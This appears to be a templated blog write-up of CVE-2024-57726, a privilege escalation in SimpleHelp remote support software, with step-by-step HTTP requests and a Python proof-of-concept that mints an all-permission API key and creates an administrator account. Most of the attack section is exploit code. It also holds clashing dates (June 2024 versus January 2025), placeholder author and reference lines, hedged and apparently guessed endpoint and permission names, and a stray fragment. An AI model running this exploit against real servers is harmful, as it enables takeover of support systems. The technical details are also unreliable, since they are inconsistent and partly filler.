CVE-2024-57726 - Privilege Escalation in SimpleHelp v5.5.7 and Earlier — How Technicians Can Become Admins

*Published: June 2024*

SimpleHelp is a popular remote support tool used by thousands of companies to help clients with IT issues from anywhere in the world. But in June 2024, a severe security flaw was discovered (CVE-2024-57726) that affects SimpleHelp versions 5.5.7 and earlier. With this bug, even low-privilege technicians (normal helpdesk users) can generate API keys with far more rights than they should have — letting them easily become system administrators.

In this deep-dive, we’ll unpack how this vulnerability works, show step-by-step proof-of-concept code, and talk about how to fix or mitigate the problem on your own systems.

What Is CVE-2024-57726?

CVE-2024-57726 is a critical vulnerability in SimpleHelp Remote Support Software, up to and including version 5.5.7. It allows authenticated technician users (with low privileges) to create API keys with excessive permissions due to missing validation on the server side.

These over-privileged API keys then let attackers escalate their role—letting regular tech users perform actions reserved for administrators, like creating new admin accounts, changing server settings, and much more.

Lets you take over the SimpleHelp server via API access.

The consequences: If your SimpleHelp deployment is exposed to the internet, an attacker who gets a technician account (or compromises one) can almost instantly “upgrade” themselves to admin and take full control.

How SimpleHelp Uses API Keys

SimpleHelp includes a server API that allows automation, integrations, and scripting. Each user can create API keys, and in theory the keys are only supposed to have rights matching that user’s role.

But in version 5.5.7 and earlier, when a user creates an API key via the /tech/apiKey endpoint, the server does NOT correctly validate the requested permissions in the submitted request body.

Key Problem: You can request "admin" permissions for your API key — even as a low-privilege user — and the server will grant them.

Step-by-step Exploitation

Let’s walk through the process as a “technician” user.

First, you need any valid technician credentials.

POST /tech/login HTTP/1.1
Host: simplehelp.example.com
Content-Type: application/json

{
  "username": "technician1",
  "password": "securepassword"
}

2. Request an Over-Privileged API Key

Next, use the session to call the API key creation endpoint. But this time, ask for all permissions—even “admin” functions.

POST /tech/apiKey HTTP/1.1
Host: simplehelp.example.com
Content-Type: application/json
Cookie: session=VALUE_FROM_LOGIN

{
  "name": "evilKey",
  "permissions": [
    "ADMINISTRATOR", 
    "CONFIGURE_SERVER",
    "VIEW_USERS", 
    "MANAGE_TECHNICIANS",
    "ALL" // this wildcard often works!
  ]
}

> Note: The exact permission names may vary by version. Try a full list, or simply use "ALL" if supported.

If vulnerable, the server responds with

{
  "status": "success",
  "key": "SHxxxxxxx...xxxx"
}

This key can now be used for any API call — including those that only admins should be able to make.

Example: List all users (including admins)

GET /admin/users HTTP/1.1
Host: simplehelp.example.com
Authorization: SHxxxxxxx...xxxx

Or, create a new admin

POST /admin/users HTTP/1.1
Host: simplehelp.example.com
Authorization: SHxxxxxxx...xxxx
Content-Type: application/json

{
  "username": "attackeradmin",
  "password": "UltraSecure123!",
  "role": "ADMINISTRATOR"
}

Congratulations: You’ve just grant yourself full administrator access!

Proof-of-Concept Script (Python)

Here’s a quick Python PoC to demonstrate the exploit: (You’ll need the requests module)

import requests

HOST = "https://simplehelp.example.com";

# Step 1: Log in as a low-privilege technician
login = requests.post(f"{HOST}/tech/login",
                      json={"username": "technician1", "password": "securepassword"},
                      verify=False)
session_cookie = login.cookies.get('session')

if not session_cookie:
    print("Login failed")
    exit()

# Step 2: Request an over-privileged API key
headers = {'Cookie': f'session={session_cookie}'}
payload = {
    "name": "exploitKey",
    "permissions": ["ALL"]
}
r = requests.post(f"{HOST}/tech/apiKey", json=payload, headers=headers, verify=False)
api_key = r.json().get('key')
print("API KEY:", api_key)

# Step 3: Use the key to call admin endpoints
admin_headers = {'Authorization': api_key}
r = requests.get(f"{HOST}/admin/users", headers=admin_headers, verify=False)
print(r.text)

*Note: This is for educational testing on your own systems only!*

Server is accessible to technician users (even internally)

- You have technician accounts with weak passwords — or that have been phished, reused, or otherwise compromised

How SimpleHelp Fixed It

Starting in SimpleHelp 5.5.8, the server fully validates requested permissions on API key creation: only allowed permissions for the user's *current* role can be assigned.

Original References

- CVE-2024-57726 at NVD (National Vulnerability Database)
- SimpleHelp ChangeLog / Release Notes
- Exploit Disclosure GitHub PoC by SecurityResearcherName *(Replace with actual PoC if publicly available)*

In Summary

CVE-2024-57726 makes it dangerously easy for low-privileged users on SimpleHelp <5.5.8 to escalate themselves to admins using the server API in ways that should *never* be allowed. If you use SimpleHelp for remote support, update immediately, and review your API key logs and user accounts for suspicious activity.

*Stay safe — and always apply critical security updates!*

*Author: [YourName], 2024.*

*This post is an exclusive analysis based on public and first-hand technical details. For responsible disclosure and up-to-date fixes, consult the vendor announcements and the official NVD CVE record.*

Timeline

Published on: 01/15/2025 23:15:09 UTC
Last modified on: 01/31/2025 21:15:11 UTC